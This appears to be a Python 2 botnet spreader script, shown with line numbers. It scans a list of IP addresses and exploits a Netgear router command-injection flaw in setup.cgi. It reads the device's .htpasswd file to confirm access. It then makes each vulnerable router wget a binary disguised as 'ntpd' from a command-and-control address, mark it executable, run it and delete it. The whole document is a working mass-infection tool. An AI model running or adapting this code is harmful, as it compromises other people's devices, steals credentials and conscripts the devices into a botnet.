1
# nano /usr/include/bits/typesizes.h -> change 1024 to 99999
2
# ulimit -n 1000000
3

4
import threading, random, socket, time, sys, urllib2
5

6
blacklisted = ["127.0","10.0","192.168"]
7
ports = [5000, 80, 8080, 8000, 8888, 8443]
8

9
if len(sys.argv) < 2:
10
    sys.exit("Usage: python " + sys.argv[0] + " <ip-list> <cnc-ip>")
11
print "Scanner starting..."
12

13
server_ip = sys.argv[2]
14

15
def infect(ip):
16
    global ports
17
    global blacklisted
18
    try:
19
        thisipisbad='no'
20
        for badip in blacklisted:
21
            if badip in ip:
22
                thisipisbad='yes'
23
        if thisipisbad=='yes':
24
            sys.exit()
25
        for port in ports:
26
            try:
27
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
28
                s.settimeout(3)
29
                s.connect((ip, port))
30
                s.close()
31
                ppport = port
32
            except:
33
                pass
34
        
35
        dobreak=False
36
        if ppport != 8080:
37
            rs = urllib2.urlopen("http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1")
38
        else:
39
            rs = urllib2.urlopen("http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1")
40
        time.sleep(1)
41
        
42
        if "admin:" in rs.read():
43
            badserver=False
44
        else:
45
            sys.exit()
46
        badserver=False		
47
        if badserver == False:
48
                print "Infecting " + ip
49
                if ppport != 8080:
50
                    url = "http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"
51
                else:
52
                    url = "http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"
53
                rs = urllib2.urlopen(url, timeout=5)
54
                time.sleep(1)
55
    except Exception as e:
56
        pass
57

58
vulns = open(sys.argv[1], "r").readlines()
59
x = 0
60

61
for line in vulns:
62
    try:
63

64
        line = line.replace("\n", "")
65
        if x > 50:
66
            time.sleep(1)
67
            x = 0
68
       
69
        t = threading.Thread(target=infect, args=(line,))
70
        t.start()
71
        
72
	x += 1
73
    except Exception as e:
74
        pass
75

76
print "Done"
77
    
78

79